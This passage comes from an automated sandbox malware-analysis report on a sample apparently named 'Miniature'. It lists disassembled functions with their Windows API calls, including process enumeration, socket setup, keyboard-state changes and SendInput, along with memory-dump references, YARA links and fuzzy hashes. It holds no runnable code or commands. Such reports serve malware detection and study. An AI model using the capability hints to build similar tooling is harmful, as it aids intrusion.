                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C736F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C73712
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C736F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C73723
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C736F4: GetCurrentThreadId.KERNEL32 ref: 00C7372A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C736F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C73731
                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 00C738C4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7373B: GetParent.USER32(00000000), ref: 00C73746
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00C7390F
                                                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(?,00C73987), ref: 00C73937
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                            • String ID: %s%d
                                                                                                                                                                                                                                                                                            • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                            • Opcode ID: cc3e2f57292b8be10122fa2cdc84f13edab99cbdea9c99c42d6a8d11b7e40b05
                                                                                                                                                                                                                                                                                            • Instruction ID: 3a7cbd60fadea7ba268de025d7d69c2791f4738b1b8be04bba2e2c527ca7ad42
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc3e2f57292b8be10122fa2cdc84f13edab99cbdea9c99c42d6a8d11b7e40b05
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3811A571600245ABDF11BF749C85FED776AAF95304F048075BD0E9B292DE709A45FB20
                                                                                                                                                                                                                                                                                            Function 00CA6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00CA6360
                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00CA638D
                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32(?), ref: 00CA639C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: 121642b0ae4f463a6bbc73882e2d7b97cae8388a16dfcb04d79e3739f7fe4b70
                                                                                                                                                                                                                                                                                            • Instruction ID: 789bd8a98ed0cd2a279f6c364ee57cbd8108e2ca45f57347d019fcb8edcd4435
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 121642b0ae4f463a6bbc73882e2d7b97cae8388a16dfcb04d79e3739f7fe4b70
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62018CB2910219AFDF219F51DC84BEE7BB4FF46359F148099F84AD6160DB308A85EF21
                                                                                                                                                                                                                                                                                            Function 00C7096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 55ca4dc9cec1d76980e12d1e75ec443ba6b6056ac0551fc5846af890523bbbd2
                                                                                                                                                                                                                                                                                            • Instruction ID: 7e72208ce6795f6228866d1593b810ee64313370e9a1cd52e63c9f8c4e5ae605
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55ca4dc9cec1d76980e12d1e75ec443ba6b6056ac0551fc5846af890523bbbd2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29C16C75A0020AEFCB05CF94C884EAEB7B5FF48714F248598E51AEB251D731EE81DB90
                                                                                                                                                                                                                                                                                            Function 00C441F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                            • Instruction ID: 40eeeee95dc8d28495b0c8e986dd66629f397f52888a272be7efbae695eef371
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFA17A729007869FEB29CF28C8917AEBBE5FF11310F3441ADE9A59B291C3789E41C750
                                                                                                                                                                                                                                                                                            Function 00C70D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CB0BD4,?), ref: 00C70EE0
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CB0BD4,?), ref: 00C70EF8
                                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00CADCE0,000000FF,?,00000000,00000800,00000000,?,00CB0BD4,?), ref: 00C70F1D
                                                                                                                                                                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 00C70F3E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7acc2ce24ed6dd966455d6e4342868652732621ccdabeb57b56a898260cd4a54
                                                                                                                                                                                                                                                                                            • Instruction ID: 89597430a5bc02d636b9e2836f1e2d90b64120b1b3c3893a1f94e12ce544497e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7acc2ce24ed6dd966455d6e4342868652732621ccdabeb57b56a898260cd4a54
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2481F971A00109EFCB14DFD4C984EEEB7B9FF89315F208598E516AB250DB71AE46CB60
                                                                                                                                                                                                                                                                                            Function 00C9B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00C9B10C
                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00C9B11A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00C9B1FC
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C9B20B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00C54D73,?), ref: 00C2E395
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 31312d2ed7180fe1b4671993335895000349f18ef208d15e2d7df58f96841953
                                                                                                                                                                                                                                                                                            • Instruction ID: 239e2faad4e2cba77ec2922f8ed146872462b0ee4e23f671a3f391e622b5e3d6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31312d2ed7180fe1b4671993335895000349f18ef208d15e2d7df58f96841953
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD5148B5508300AFC710EF24D886A9FBBE8FF89754F40491DF99597261EB30D944DB92
                                                                                                                                                                                                                                                                                            Function 00C51711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 42e6de6a66ba53361b2a06121ecf0f3477263d2f6b7e3640eb13091c17bb615a
                                                                                                                                                                                                                                                                                            • Instruction ID: a3f3e379ef5f9acf955dd72c31fbf68f1654c31ccafe0c031e213ac08614d350
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42e6de6a66ba53361b2a06121ecf0f3477263d2f6b7e3640eb13091c17bb615a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E415939A10100ABDB307FBE8C4AB7E3AB4EF05371F1D0625FC28D61D1DA744989A365
                                                                                                                                                                                                                                                                                            Function 00C92533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00C9255A
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C92568
                                                                                                                                                                                                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C925E7
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C925F1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5616d8681ff3cacfefcb3d6715f6f1206bc9b97a87232e9e4017a01420795f44
                                                                                                                                                                                                                                                                                            • Instruction ID: e8214271fcfff9b52dfb104fdf95f7eb0fc3fdef778c2f49f526d43a38f5097f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5616d8681ff3cacfefcb3d6715f6f1206bc9b97a87232e9e4017a01420795f44
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A41E378A00210AFE720AF24C88AF6A77E4AF45758F54C448F9568F7D2C771ED41DB90
                                                                                                                                                                                                                                                                                            Function 00CA6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00CA6D1A
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00CA6D4D
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00CA6DBA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a3a3cdbf3cf490651a4affbfa243233509cb9b128c5b394b26f3974ac1fc202c
                                                                                                                                                                                                                                                                                            • Instruction ID: d0950bd183433fc36a4e446ac0178d849173be2a29830e0414dc496a54a9aa94
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3a3cdbf3cf490651a4affbfa243233509cb9b128c5b394b26f3974ac1fc202c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C516474A0020AEFCF14DF64D880AAE7BB6FF46764F148559F9259B290D730EE81CB50
                                                                                                                                                                                                                                                                                            Function 00C4B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 75a5c48090c7659b7470e3201efdfac7363d90dda59a92ca2f347c84331a005c
                                                                                                                                                                                                                                                                                            • Instruction ID: 52f536fcb3e5b90688d3a839b0d39ab05d1d405f58294919a67f9e2dcc1209ee
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75a5c48090c7659b7470e3201efdfac7363d90dda59a92ca2f347c84331a005c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D341F175A00604AFD725AF78CC42BAABBE8FB88720F10852AF015DB2D1D371EA419780
                                                                                                                                                                                                                                                                                            Function 00C8611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C861C8
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00C861EE
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C86213
                                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C8623F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6da73f61b317d5eece6da694e06678fab00c95bb48dc6086fce2db9f2fd8aa93
                                                                                                                                                                                                                                                                                            • Instruction ID: 42bcd83c7557a62becedcd26635609d2d3346a8042ccf556e9a67a6f2937f784
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6da73f61b317d5eece6da694e06678fab00c95bb48dc6086fce2db9f2fd8aa93
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3414D39600610DFCB11EF15C585A5EBBF2EF8A714B188488F85A9B362CB30FD45EB91
                                                                                                                                                                                                                                                                                            Function 00C7B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C7B473
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 00C7B48F
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C7B4FD
                                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C7B54F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5f729f5ab7a2fd2866a60c2d0997941ecf0448bbc4a8e3dc74504f130d19696d
                                                                                                                                                                                                                                                                                            • Instruction ID: 349afcde2cc98951b9e2f8b39faf9098e4f4c2c160d6dd1e279c8855b27bac50
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f729f5ab7a2fd2866a60c2d0997941ecf0448bbc4a8e3dc74504f130d19696d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72310970A406086EFF318B658805BFE7BB5AF49310F08C21AF4AE961D2C3748E459751
                                                                                                                                                                                                                                                                                            Function 00C7B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
